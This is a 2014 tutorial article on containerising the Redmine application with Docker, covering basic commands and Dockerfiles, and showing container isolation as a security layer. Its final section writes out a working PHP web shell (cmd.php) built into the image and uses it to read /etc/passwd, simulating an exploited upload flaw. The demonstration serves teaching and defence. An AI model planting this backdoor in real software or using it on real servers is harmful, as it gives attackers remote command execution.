Digital forensics

Securing Cloud-Based Applications with Docker

Dejan Lukan
February 26, 2014 by
Dejan Lukan

Introduction to Docker

In this article, we'll first introduce Docker and try to explain how it works. After setting the stage, we'll simulate the file upload vulnerability by copying the shell into the Redmine Docker image. This is effectively the same as if an attacker would find and exploit the vulnerability in Redmine, which would give him command-line access to the server.

Docker is a virtualization container that can be used for the deployment of applications. I've recently been tasked with installing Redmine application on the server, which has been quite fun. I've had some problems while doing it and I could do it again without a problem within a week, because all of the tweaks are still fresh in my mind. But what about after a month? That's an entirely different story: By that time, I would probably forget all the details and would need to browse the Internet again. The problem is that installing applications has become quite complex, because each application requires different dependencies, which we need to install in order to run the application. There's also the problem of running multiple applications on the same server, which happens all the time. We don't want to install just one application in its own virtual machine, because we're wasting precious resources but, on the other hand, we can't run both Apache and Nginx web servers at the same time, because they both listen on port 80. Sure, we could tweak the configuration options to overcome this limitation, but is that really the path we want to take? If we do, then we'll very likely encounter the following problems [1]:

Learn Digital Forensics

Learn Digital Forensics

Build your skills with hands-on forensics training for computers, mobile devices, networks and more.
  • Isolation—If two applications have different but mutually exclusive dependencies, it would be very hard for both applications to be running on the same system.
  • Security—When two applications are running on the same system, and one contains a vulnerability that a hacker has exploited, the other applications are also affected.
  • Upgrades—When upgrading applications, the upgrade process typically overwrites the configuration files and we have no way of reverting back to the old application.
  • Backups and snapshots—Normally, we can't simply back up a state of the application once everything has been set up.
  • Reproducibility—Usually, we have an automation system like Puppet, Chef, or Cfengine, which is used for the automation of certain tasks, such as automated package installation or editing of configuration files, but this process doesn't always work, which is why we're left with a broken production system that we must fix as soon as possible.
  • Constraint on resources—When one application takes up all of the system's resources, other applications will stop working or will be quite slow, because they don't have any resources left; normally there is no easy way to limit the application to only use certain amount of RAM or CPU.
  • Ease of installation—When using the previously mentioned automated system, we can't guarantee that installation of certain application will be correct, because the system is in an unpredictable state and there are a number of things that can go wrong.
  • Ease of removal—We can normally install applications with the distribution's package manager, but removing them is an entirely different story. Has it happened to you that, when you removed the package, the configuration files in /etc/ directory have been left intact?

We have already mentioned that we can solve the problem if we run each application in a separate virtual machine, which solves all of the problems outlined above. The problem when running each application in a separate virtual machine is that resources are wasted, since the virtual machine itself needs to run the whole operating system to support just that one application. Wouldn't it be better if only one operating system was required for multiple applications? This is possible with Docker, which is basically just a wrapper around LXC (Linux Containers). When using Docker, we can isolate file systems, users, processes, and networks for each application, which solves all problems in a lightweight manner. This is because Docker uses LXC, which in turn uses the host's kernel, which is why everything is executing really fast.

Docker Usage

We can install Docker by using our default package manager. Installation instructions for supported operating systems can be found at [2]. After the installation, running Docker will print all the commands Docker supports, which can be seen below.

[plain]

# docker

Usage: docker [OPTIONS] COMMAND [arg...]

-H=[unix:///var/run/docker.sock]: tcp://host:port to bind/connect to or unix://path/to/socket to use

A self-sufficient runtime for Linux containers.

Commands:

attach Attach to a running container

build Build a container from a Dockerfile

commit Create a new image from a container's changes

cp Copy files/folders from the containers filesystem to the host path

diff Inspect changes on a container's filesystem

events Get real time events from the server

export Stream the contents of a container as a tar archive

history Show the history of an image

images List images

import Create a new filesystem image from the contents of a tarball

info Display system-wide information

insert Insert a file in an image

inspect Return low-level information on a container

kill Kill a running container

load Load an image from a tar archive

login Register or Login to the docker registry server

logs Fetch the logs of a container

port Lookup the public-facing port which is NAT-ed to PRIVATE_PORT

ps List containers

pull Pull an image or a repository from the docker registry server

push Push an image or a repository to the docker registry server

restart Restart a running container

rm Remove one or more containers

rmi Remove one or more images

run Run a command in a new container

save Save an image to a tar archive

search Search for an image in the docker index

start Start a stopped container

stop Stop a running container

tag Tag an image into a repository

top Look up the running processes of a container

version Show the docker version information

wait Block until a container stops, then print its exit code

[/plain]

Keep in mind that Docker needs to be running in daemon mode, which can be achieved by passing the -d parameter to Docker. This is done automatically by the Docker init script, so we normally don't have to do it manually.

When we start using Docker, we must first base off from an official image. Official images are available at https://index.docker.io. We'll be basing this on the Ubuntu image, since it has been the most widely used. We can download the base image simply by running the docker run command, which will download the Ubuntu image automatically if it hasn't been downloaded already. The command after the image name is the command we would like to execute inside the Docker image. We're executing BASH inside the image, since we want to have terminal access to the image. The -i parameter is keeping the stdin open even if not attached and the -t allocates a pseudo-tty. The whole command can be seen below.

[plain]

# docker run -t -i ubuntu /bin/bash

WARNING: IPv4 forwarding is disabled.

root@adb11c65be5c:/#

[/plain]

Right after entering the image, we can encounter the first sign of trouble. When running "apt-get update" command, the name resolution is not working.

[plain]

# apt-get update

Err http://archive.ubuntu.com precise InRelease

Err http://archive.ubuntu.com precise Release.gpg

Temporary failure resolving 'archive.ubuntu.com'

Reading package lists... Done

W: Failed to fetch http://archive.ubuntu.com/ubuntu/dists/precise/InRelease

W: Failed to fetch <a href="http://archive.ubuntu.com/ubuntu/dists/precise/Release.gpg">http://archive.ubuntu.com/ubuntu/dists/precise/Release.gpg</a>

Temporary failure resolving 'archive.ubuntu.com'

W: Some index files failed to download. They have been ignored, or old ones used instead.
[/plain]

But as it turns out, we have to enable IP forwarding, which was also a warning displayed when entering Docker. We can simply enable the IP forwarding with sysctl command below.

[plain]

# sysctl -w net.ipv4.ip_forward=1

net.ipv4.ip_forward = 1

[/plain]

After reentering the ubuntu base image, we can run "apt-get update" normally, as Docker now has access to the Internet. From now on, we can run arbitrary commands in Docker, which will take effect immediately. But when exiting and reentering Docker image, those changes will be gone. This is because we have to commit the changes to the repository to create another image. Every time we enter and exit Docker, a new container is created. We can list all containers by executing the "docker ps -a" command.

After entering and exiting Ubuntu image for the first time, the following containers will be present. Note that we didn't change anything in the container de1e31ec7299.

[plain]

# docker ps -a

CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS

de1e31ec7299 ubuntu:12.04 /bin/bash 30 seconds ago Exit 0

[/plain]

But we wanted to have dig command available in the image, so we can run DNS queries. For that, we have to reenter the Ubuntu container and install dnsutils, which contains quite a few DNS programs, including dig. After running "apt-get install dnsutils," the dig command is available and we can run it normally. If we exit the ubuntu image, and run the "docker ps -a" again, we can observe an additional container with an ID 9030c1635eb8.

[plain]

# docker ps -a

CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS<strong>

9030c1635eb8 ubuntu:12.04 /bin/bash 3 minutes ago Exit 0

de1e31ec7299 ubuntu:12.04 /bin/bash 4 minutes ago Exit 0

[/plain]

If we reenter the Ubuntu image now, the dig command won't be available, because we haven't entered the container with an ID 9030c1635eb8. In order to be able to continue working from the container 9030c1635eb8, we have to commit it to the repository. The name of the repository follows the Github naming convention, where the name is of the form username/imagename: The username is our Docker username and imagename is the name of the image.

[plain]

# docker commit 9030c1635eb8 proteansec/ubuntu

62bd59ac78205d9dad7c52365d443c339a89e6cab13b4c33024881750ed052f8

[/plain]

After that we can enter that repository with the same "docker run" command except passing it proteansec/ubuntu image name instead of just ubuntu.

Up until now we have presented a few basics of using Docker and in the next part we'll be installing the Redmine application, which we'll later try to exploit.

Docker and Redmine

If we go to https://index.docker.io/ and search for "redmine," results about prior work on putting Redmine to Docker will be displayed. There are various images already available from various contributors. Some are built on Ubuntu, CentOS, and Turnkey Redmine, while some are built from source. The most popular version appears to be sameersbn/redmine, which we'll be using in this article. There are multiple ways of downloading and installing the image:

  • Docker Index—We can install the container image by simply pulling it from the Docker index. We can do that by running "docker pull sameersbn/redmine"
  • Dockerfile—To install the container image with Dockerfile, we need to copy it to Dockerfile and then run "docker build -t="myusername/redmine."
  • Manual—We can also look at the Dockerfile and run the commands manually inside a new container after which we can save the container.

We've seen that containers can be built manually by running commands or automatically by using Dockerfiles. A Dockerfile is a file that contains various commands used to build containers automatically. Available commands that we can use in Dockerfiles are the following.

  • FROM defines the base image the automation process will build upon and must be the first line in a Dockerfile.
  • MAINTAINER is the author of the Dockerfile.
  • RUN is the execution directive, which takes command and executes it when building the image.
  • ADD is used to copy the files from host machine to the container.
  • EXPOSE exposes the container port to the host machine to enable network communication to the application installed in a container.
  • ENTRYPOINT specifies default application used when container is started.
  • CMD is similar to the RUN command, except that CMD commands are not executed when building the image, but when the image is executed.
  • ENV sets environment variables, which can be accessed by scripts and applications in the container.
  • USER is the user which is used to run the container.
  • VOLUME is used to enable access from the container to the host machine by mounting the volume.
  • WORKDIR defines the working directory from where the CMD commands will be run.

Take a look at the Redmine Dockerfile available at [3], which is very simple and does the following:

  • Bases off the ubuntu:12.04 image.
  • Installs various packages with apt-get install as well as correcting the sources.list.
  • Downloads Ruby 1.9.3 and installs it onto the system.
  • Install passenger gem and passenger Apache module.
  • Copies the resources/ directory from host machine to the /redmine/ directory in image.
  • Fixes permissions for scripts inside the /redmine directory and runs the /redmine/setup/install script, which configures Apache, installs Redmine into /redmine/ directory, installs required gems, configures Redmine themes and plug-ins, fixes permissions and configures supervisord.
  • Copies the authorized_keys from host machine to the /root/.ssh/ directory.
  • Moves .vimrc and .bash_aliases files to the /root/ directory.
  • Fixes permissions for the /root/.ssh directory and for the authorized_keys.
  • Exposes port 80.
  • Defines the script /redmine/redmine as an entrypoint and passes it "app:start" when executing the container. This script defines environment variables used by the image, starts mysql, populates redmine database in Mysql if empty, fixes certain permissions, configures mail delivery for Redmine and starts Redmine.

With Docker, we can pass an arbitrary number of environment variables to the container by passing the -e option to "docker run."

[plain]

# docker run -h

-e=[]: Set environment variables

[/plain]

Let's create a simple test that will show how to pass an environment variable, CUSTOMVAR:

[plain]

# docker run -i -t -e CUSTOMENV=CUSTOMVALUE sameersbn/redmine env

APACHE_PID_FILE=/var/run/apache2.pid

HOSTNAME=05218ae2337f

APACHE_RUN_USER=www-data

TERM=xterm

APACHE_LOG_DIR=/var/log/apache2

PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

PWD=/redmine

APACHE_RUN_GROUP=www-data

CUSTOMENV=CUSTOMVALUE

SHLVL=1

HOME=/

APACHE_RUN_DIR=/var/run/apache2

APACHE_LOCK_DIR=/var/run/lock/apache2

container=lxc

_=/usr/bin/env

OLDPWD=/

[/plain]

Notice that the custom environment variable CUSTOMENV has been set. Most of time we're passing environment variables to Docker because we would like to tune certain things, such as configuration files. The Redmine Docker is capable of tuning Mysql, Smtp and Passenger settings. It does so in a very hackish way. After installing the sameersbn/redmine container, the config/database.yml will contain the following, where the {{VAR}} still needs to be replaced by actual values, which is done at runtime (and not during installation).

When executing the container, default variables are set in the ENTRYPOINT script, as can be seen below:

Before the script actually runs Redmine, it also changes the configuration variables with sed, as seen below. By doing that, we can run Redmine with custom settings and connect to the external Mysql database if we want. When the Docker container stops, the values in database.yml are not preserved, because we're not doing a commit, which is why we can change those settings every time we run Docker container.

The basic idea is changing the tunable variables in a container at runtime, where there are various ways of doing that. We need to use some kind of wrapper to change the configuration options and then start the application.

Let's now enter the Docker container by running the "docker run -t -i sameersbn/redmine /bin/bash" command. After getting the BASH shell, we can list the applications listening on port, which are apache, sshd, and mysqld.

[plain]

# netstat -luntp

Active Internet connections (only servers)

Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name

tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 16/apache2

tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 15/sshd

tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN 377/mysqld

tcp6 0 0 :::22 :::* LISTEN 15/sshd

[/plain]

There is also a limited number of processes running, because Docker is using the host's kernel and doesn't need to start the whole operating system for one application.

[plain]

# ps aux

USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND

root 1 0.0 0.1 17880 1596 ? S 15:29 0:00 /bin/bash /redmine/redmine /bin/bash

root 9 0.0 1.1 59668 11684 ? Ss 15:29 0:00 /usr/bin/python /usr/bin/supervisord

root 14 0.0 0.1 19104 1032 ? S 15:29 0:00 /usr/sbin/cron -f

root 15 0.0 0.2 49948 2868 ? S 15:29 0:00 /usr/sbin/sshd -D

root 16 0.0 0.4 80980 4816 ? S 15:29 0:00 /usr/sbin/apache2 -DFOREGROUND

root 17 0.0 0.0 4392 748 ? S 15:29 0:00 /bin/sh /usr/bin/mysqld_safe

root 351 0.0 0.1 220920 2052 ? Ssl 15:29 0:00 PassengerWatchdog

root 354 0.0 0.2 295300 2272 ? Sl 15:29 0:00 PassengerHelperAgent

root 356 0.0 0.8 109304 9108 ? Sl 15:29 0:00 Passenger spawn server

nobody 359 0.0 0.4 169316 4700 ? Sl 15:29 0:00 PassengerLoggingAgent

www-data 367 0.0 0.2 81004 2428 ? S 15:29 0:00 /usr/sberin/apache2 -DFOREGROUND

www-data 368 0.0 0.2 81004 2428 ? S 15:29 0:00 /usr/sbin/apache2 -DFOREGROUND

www-data 369 0.0 0.2 81004 2428 ? S 15:29 0:00 /usr/sbin/apache2 -DFOREGROUND

www-data 370 0.0 0.2 81004 2428 ? S 15:29 0:00 /usr/sbin/apache2 -DFOREGROUND

www-data 371 0.0 0.2 81004 2428 ? S 15:29 0:00 /usr/sbin/apache2 -DFOREGROUND

mysql 377 0.0 4.0 492432 41580 ? Sl 15:29 0:00 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib/mysql/plugin --user=mysql --pid-file

root 378 0.0 0.0 4296 636 ? S 15:29 0:00 logger -t mysqld -p daemon.error

root 438 0.0 0.1 18044 1960 ? S 15:30 0:00 /bin/bash

root 447 0.0 0.1 15272 1144 ? R+ 15:32 0:00 ps aux

[/plain]

To bind the port 80 (Apache) in the container to port 8888 in the host machine, we have to run the following command.

[plain]
# docker run -d -p 8888:80 sameersbn/redmine

# netstat -luntp

tcp6 0 0 :::8888 :::* LISTEN 5454/docker

[/plain]

We can see that the host machine is listening on port 8888, which when connected to will redirect the connection to Docker container on port 80, where Apache is listening and serving the Redmine application. If we connect to the port 8888 now, we'll actually connect to Redmine running inside Docker container.

Uploading the Shell

Here we'll copy the shell into the Docker image to simulate the successful upload vulnerability an attacker has exploited. First we have to setup an environment where we'll be able to execute scripts in CGI way. Since we're using Apache web server in Redmine Docker container, we'll be adding the libapache2-mod-php5 to the container, so we can deploy the PHP web shell.

The best way add some files and install packages to an image is creating a new Dockerfile and base off from sameersbn/redmine parent image. Let's present all the steps, which we have to follow to actually deploy the web shell.

First we have to pull an existing Docker image from the Internet by using the "docker pull" command.

[plain]

# docker pull sameersbn/redmine

[/plain]

Then we have to create another directory and create Dockerfile with the following contents.

[plain]

FROM sameersbn/redmine

RUN apt-get -y install libapache2-mod-php5

ADD redmine.conf /etc/apache2/conf.d/redmine.conf

ADD phpinfo.php /redmine/public/phpinfo.php

ADD cmd.php /redmine/public/cmd.php

[/plain]

The first line tells Docker that we're basing our image from sameersbn/redmine. Then, we're installing the libapache2-mod-php5 by using RUN docker command into the image. After that we're adding three files to the Docker image: redmine.conf, phpinfo.php and cmd.php. The redmine.conf is replaced with existing redmine.conf, because we want to add PHP support to Apache and it looks like this:

[plain]

<VirtualHost *:80>

RailsEnv production

DocumentRoot /redmine/public

CustomLog /var/log/apache2/access.log common

ErrorLog /var/log/apache2/error.log

<Directory /redmine/public>

AllowOverride all

Options -MultiViews

</Directory>

Alias /cgi /redmine/cgi

<Directory /redmine/cgi>

AddHandler php5-script .php

AddType text/html .php

</Directory>

</VirtualHost>

[/plain]

We also need to create the phpinfo.php script, which is basically a PHP script that displays information about the PHP environment.

[plain]

<?php

phpinfo();

?>

[/plain]

The cmd.php is our webshell backdoor that we also want to deploy to the container and can be copied from the Kali Linux distribution. For completeness, it's presented below:

[plain]
<?php

if(isset($_REQUEST['cmd'])){

echo "<pre>";

$cmd = ($_REQUEST['cmd']);

system($cmd);

echo "</pre>";

die;

}

?>
[/plain]

After that we actually need to create the new image proteansec/redmine by using the command below (we need to be in the directory where the Dockerfile is located).

[plain]

# docker build -t proteansec/redmine .

[/plain]

Then we can start a new container from the newly built image by using the command below, which will start the new Redmine image and redirect host's port 8888 to the Docker image port 80.

[plain]

# docker run -d -p 8888:80 proteansec/redmine

[/plain]

After waiting a few minutes to let everything start, the Redmine is accessible on the address http://192.168.1.2:8888/, as we've already seen. In addition, the phpinfo.php script is also executable and prints the information about install PHP environment, as can be seen below:

That proves that PHP is working, so our webshell should also be working. Let's try to execute the ls command by passing it in the cmd GET parameter. In the picture below, we can see that our webshell actually works as expected and we've successfully gained access to the system (as a malicious hacker could by exploiting a vulnerability).

We can execute the "cat /etc/passwd" command to print the contents of the /etc/passwd file, which can be seen below. The great thing about using Docker is that we're restricted to the Redmine Docker application and we're actually printing the /etc/passwd file of the Docker application and not the host system. Therefore, the attacker has access only to the application and its required components, but not to the other applications or the host operating system, which greatly increases the overall security.

Conclusion

We've seen that Docker is a very nice project that we can use to do many things. In the beginning of the article we mentioned that it solves many problems, such as isolation, security, upgrades, etc. We've also mentioned the benefits of Docker over Puppet, Chef, and Cfengine, but those products are actually very similar. Puppet, Chef, and Cfengine work on the same host operating system trying to install all dependencies and configure the application, which is also what Docker does, but with one big difference: Docker uses its own container for each of the applications it's trying to deploy, while Puppet, Chef, and Cfengine do not. Therefore, Docker starts executing practically the same scripts in a controlled environment where the result of each action is known in advance, while the Puppet, Chef, and Cfengine operate in an unpredictable environment.

Docker is still a very young project, so not all applications have been ported to Docker, while other applications are available, but not customizable enough; when installing an application, we want to be in control of the installed application. If we would like it to use the database on an external accessible host, we should be able to do that. While Docker images are still in the early development phase, they will probably be fully customizable in short time.

We've also added a PHP webshell to the Docker image and tried to print the /etc/passwd file, which was successful, but it was the /etc/passwd of the Docker image rather than of the hosts. Therefore, the hacker that successfully exploited a vulnerability in an application but is restricted to the Docker application environment, rather than being able to access the host's filesystem. This greatly improves the security of the application and the operating system, because it restricts the hacker into a sandbox, which it must bypass to reach the host. It's another layer of security needed to by bypassed by malicious hackers in order to gain access to the host operating system.

References:

[1] Docker: Using Linux Containers to Support Portable Application Deployment:
http://www.infoq.com/articles/docker-containers/.

[2] Installation:
http://docs.docker.io/en/latest/installation/.

Learn Digital Forensics

Learn Digital Forensics

Build your skills with hands-on forensics training for computers, mobile devices, networks and more.

[3]Docker Redmine and sameersbn/redmine:
https://index.docker.io/u/sameersbn/redmine/.